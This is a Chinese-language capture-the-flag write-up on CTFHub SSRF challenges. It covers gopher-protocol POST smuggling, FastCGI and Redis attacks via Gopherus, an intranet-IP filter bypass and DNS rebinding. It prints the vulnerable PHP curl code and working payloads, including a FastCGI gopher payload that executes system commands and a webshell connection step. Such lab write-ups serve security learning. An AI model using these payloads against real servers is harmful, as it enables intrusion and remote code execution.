CTFHUB SSRF
通过协议绕过
post
打开index.php F12看源码
<?php
error_reporting(0);
if (!isset($_REQUEST['url'])){
header("Location: /?url=_");
exit;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
?>
看到 header(“Location: /?url=_”); 重定向页面到GET到url的内容,根据提示我们要构造一个POST请求
127.0.0.1/flag.php F12看源码
POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
key=92635644157d7ddc6cf24da0e781978e
这是传参包裹的形式
然后进行url三次编码即
127.0.0.1/index.php/?url=gopher://127.0.0.1:80/_POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Type%25253A%252520application%25252Fx-www-form-urlencoded%25250D%25250AContent-Length%25253A%25252036%25250D%25250A%25250D%25250Akey%25253D92635644157d7ddc6cf24da0e781978e
这是传入的url
彩色部分是个人的key 替换成你的后即可传参
并且我在本题中传参输错时出现了这样一段话
上传文件
这次需要上传文件 但网页中没有提交按钮,修改源代码添加提交按钮
<input type="submit" name="submit">
提交文件,并抓包
将这个包按之前同样的方式urlencode然后整合进新包里
fastcgi
使用gopherus
gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH70%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00F%04%00%3C%3Fphp%20system%28%27find%20/%20-name%20flag%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
然后将 /_ 后面的%01……按之前方法编码再加上前面的gopher://127.0.0.1:9000/_合并就是payload
得出flag所在位置
然后再用gopherus 将command换为cat flag所在目录
注意:这里有两个带flag的 应该cat那个文件名后带一串数字的
Redis协议
同样使用gopherus
按照之前方式将gopher编码
然后蚁剑连

<?php
error_reporting(0);
if (!isset($_REQUEST['url'])) {
header("Location: /?url=_");
exit;
}
$url = $_REQUEST['url'];
if (preg_match("/127|172|10|192/", $url)) {
exit("hacker! Ban Intranet IP");
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
?>
只过滤了数字部分数字 可用localhost绕过 进制绕过仍可
DNS重绑定 Bypass
开启后有教学
通过DNS rebinding.将两域名绑定